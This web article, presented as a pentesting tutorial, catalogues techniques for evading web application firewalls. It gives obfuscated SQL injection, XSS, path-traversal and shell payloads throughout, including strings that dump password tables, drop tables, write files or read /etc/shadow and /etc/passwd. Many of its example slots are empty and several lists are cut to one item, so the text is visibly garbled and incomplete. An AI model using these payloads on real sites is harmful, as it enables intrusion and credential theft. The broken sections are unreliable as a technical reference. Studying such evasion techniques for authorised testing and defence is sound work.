How to hack and bypass a web application firewall WAF during penetrating testing

The term web application firewall (WAF) refers to a set of monitoring tools and filters designed to detect and block network attacks against a specific web application. According to pentesting experts at the International Institute of Cyber Security (IICS), these are security tools that, in real time, decide whether to allow or deny access to an online deployment.

Like any other security solution, a WAF is only a complementary solution for a comprehensive security environment, so it must be implemented along with other elements such as incident monitoring tools or anti-fraud systems.

A pentesting process against a WAF allows researchers to determine the real IP address of the target and, at later stages, try to evade this protection mechanism. The WAF compromise allows researchers (and also hackers) to know what’s behind these implementations.

Pentesting experts consider that nearly 50% of WAF implementations are vulnerable to one or more evasion methods, as hackers have made great strides in attack variants to these solutions, primarily by delivering malicious payloads disguised as legitimate software.

On this occasion, we will show you some techniques and tools to analyze a WAF and evade these security measures. As usual we remind you that this article was prepared for informational purposes only, so IICS is not responsible for the misuse that may be given to the information contained herein.

HOW TO DETECT A WAF?

There is a general process for finding the actual IP of a target website:

  • Employ shodan.io or censys.io

To check if a WAF is configured correctly, pentesting experts recommend relying on the following indicators:

  • A WAF uses standard ports 80, 443, 8000, 8008, 8080, and 8088

To verify the proper configuration of these devices, experts can:

  • Send a standard GET request from the browser, intercept and write the response headers

WAF HACKING TOOLS

Most hackers use automated tools to speed up web application firewall evasion processes. Below is a small list of the most popular tools for these activities; its use is only the first step in verifying how much information an attacker will be able to access.

  • w3af: A framework for auditing and attacking web applications

There are many other tools, but pentesting experts claim that these are the most popular.

WAF EVASION

Below we will review some of the best known WAF bypassing techniques.

Case switch technique

It consists of the combination of uppercase and lowercase characters.

Basic request payload:

Bypassing technique:

Basic request:

SELECT * FROM * WHERE OWNER = 'NAME_OF_DB'

Bypassing technique:

sELeCt *fRoM*wHerE OWNER='NAME_OF_DB'

Example in URL:

http://example.com/index.php?page_id=-1 UnIoN SeLeCT 1,2,3,4

URL encoding technique

Pentesting experts can also modify a normal payload with %encoding/ URL. For this technique you can use Burp Suite, which has a built-in coding and decoding tool.

WAF-blocked payload:

Bypassing technique:

%3CSvg%2Fx%3D%22%3E%22%2FOnLoAD%3Dconfirm%28%29%2F%2F

WAF-blocked payload:

UniOn(SeLeCt 1,2,3,4,5,6,7,8,9,10)

Bypassing technique:

UniOn%28SeLeCt+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%29

Example in URL:

https://example.com/page.php?id=1%252f%252a*/UNION%252f%252a /SELECT

Unicode technique

ASCII characters provide us with excellent solutions to evade a WAF. Encode the entire payload or just one fragment for satisfactory results.

Basic request:

Obfuscation:

WAF-blocked code:

/?redir=http://google.com

Bypassing technique:

/?redir=http://google。 com (Unicode)

WAF-blocked code:

Bypassing technique:

Basic request:

Obfuscation:

%C0AE%C0AE%C0AF%C0AE%C0AE%C0AFetc%C0AFshadow

HTML presentation

According to pentesting experts, web applications encode special characters in HTML; encoding and rendering, respectively basic cross-sectional cases with numeric and general HTML encoding.

Basic request:

Encoded payload:

"><img src=x onerror=confirm()>

Encoded payload:

Mixed coding techniques

These rules tend to filter a particular type of encoding. These filters can be omitted using the combined encoding payload, using new lines and tabs and increased obfuscation.

Obfuscated payload:

Comment technique

Sometimes hackers often hide standard payload vectors in code comments, pentesting experts mention. Different payloads have different obfuscation methods.

WAF-blocked code:

WAF Evasion:

WAF-blocked code:

WAF Evasion:

/?id=1+un/**/ion+sel/**/ect+1,2-

Attackers can also insert comments in the middle of the lines of attack. For example, / *! SELECT * / can be ignored by the WAF implementation, but passed to the target application and processed by the MySQL database.

Example in URL:

index.php?page_id=-1 %55nION/**/%53ElecT 1,2,3,4'union%a0select pass from users#

Example in URL:

index.php?page_id=-1 /*! UNION*/ /*! SELECT*/ 1,2,3

Double encoding method

WAF filters typically encode characters to protect a web application. Poorly designed filters can be evaded with relative ease using double coding, say pentesting experts.

Basic request:

http://example/cgi/../../winnt/system32/cmd.exe?/c+dir+c:

Obfuscated payload:

http://example/cgi/%252E%252E%252F%252E%252E%252Fwinnt/system32/cmd.exe?/c+dir+c:

Basic request:

Obfuscated payload:

%253Cscript%253Econfirm()%253C%252Fscript%253E

Template obfuscation

Several command-line utilities use templates to work with multiple files globally. We can change these templates to run system commands.

Basic request:

Obfuscated payload:

Characters used:

Basic requests:

Obfuscated payload:

Characters used:

Dynamic loading technique

Programming languages have different templates and syntax for concatenation. According to pentesting experts, this allows you to create payloads that can evade various filters and rules.

Basic request:

Obfuscated payload:

Basic request:

Obfuscated payload:

/bi'n'''/c''at' /e'tc'/sh''ad'ow

Bash allows the concatenation of paths for execution.

Basic request:

Obfuscated payload:

Junk character technique

These are simple payloads easily filtered by WAF. In some cases, adding some unwanted characters helps avoid detection, allowing pentesting experts to obfuscat regular expression firewalls.

Basic request:

Obfuscated payload:

Basic request:

Obfuscated payload:

Basic request:

WAF Evasion:

Line break technique

Much regular expression filtering WAF effectively blocks multiple attempts. The line break technique (CR and LF) can break the firewall’s regular expression to bypass security measures.

Basic request:

Obfuscated payload:

Invalid uninitialized variable technique

Regular expression filters can be omitted by using uninitialized bash variables. This value is zero and acts as empty strings. Bash and Perl allow such interpretations.

Basic request:

Obfuscated payload:

Basic request:

Obfuscated payload:

$u/bin$u/cat$u $u/etc$u/shadow$u

Basic request:

Obfuscated payload:

$aaaaaa/bin$bbbbbb/cat$ccccccc $dddddd/etc$eeeeeee/passwd$fffffff

Tabs and line break

Tabs are often used to bypass firewalls, especially those based on regular expressions. Tabs can help break a WAF regular expression when the regular expression expects spaces instead of tabs.

Basic request:

Bypassing technique:

Variant:

Basic request:

http://test.com/test?id=1 union select 1,2,3

Bypassing technique

http://test.com/test?id=1%09union%23%0A%0Dselect%2D%2D%0A%0D1,2,3

Basic request:

Obfuscated payload:

Token Breakers

Token attacks are based on trying to break the logic of splitting a request into tokens using means of token protection, pentesting experts say. Token breakers are tokens that allow you to influence the correspondence between a string element and a specific token. Our request must remain valid when using token crackers.

Our payload:

?id='-sqlite_version() UNION SELECT passwords FROM users -

Example: unknown context for the pentester.

First payload:

?id=12);D ROP TABLE users -

Second payload:

?id=133) INTO OUTFILE 'xxx' -

Obfuscation technique in other formats

Many web applications support different types of encoding and can interpret it. We will always need to obfuscat the payload in a non-WAF-compliant format, but the server can forward our payload.

IIS case:

IIS 6, 7.5, 8, and 10 can be interpreted as IBM037.

Send parameters encoded with:

POST /example.aspx?id7=sometext HTTP/1.1 HOST: target.org Content-Type: application/x-www-form-urlencoded; charset=utf-8 Content-Length: 27 id2='union all select * from users-POST /example.aspx?%89%84%F7=%A2%95%94%86%A3%88%89%95%87 HTTP/1.1 HOST: target.org Content-Type: application/x-www-form-urlencoded; charset=ibm037 Content-Length: 127 %89%84%F2=%7D%A4%95%89%97%95%40%81%93%94%40%A2%85%93%85%84%A3%40%5C%40%86%99

Finally, pentesting experts have a number of useful tips during these safety tests:

  • Always try to address the problem as comprehensively as possible

For further reports on vulnerabilities, pentesting, exploits, malware variants, cybersecurity risks and information security courses fell free to visit the International Institute of Cyber Security (IICS) websites, as well as the official platforms of technology companies.

Originally published at https://www.securitynewspaper.com on September 16, 2021.

Knowledge belongs to the world

Knowledge belongs to the world